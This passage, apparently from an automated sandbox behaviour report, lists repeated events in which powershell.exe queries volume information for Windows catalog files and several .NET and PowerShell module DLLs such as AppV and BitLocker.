                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
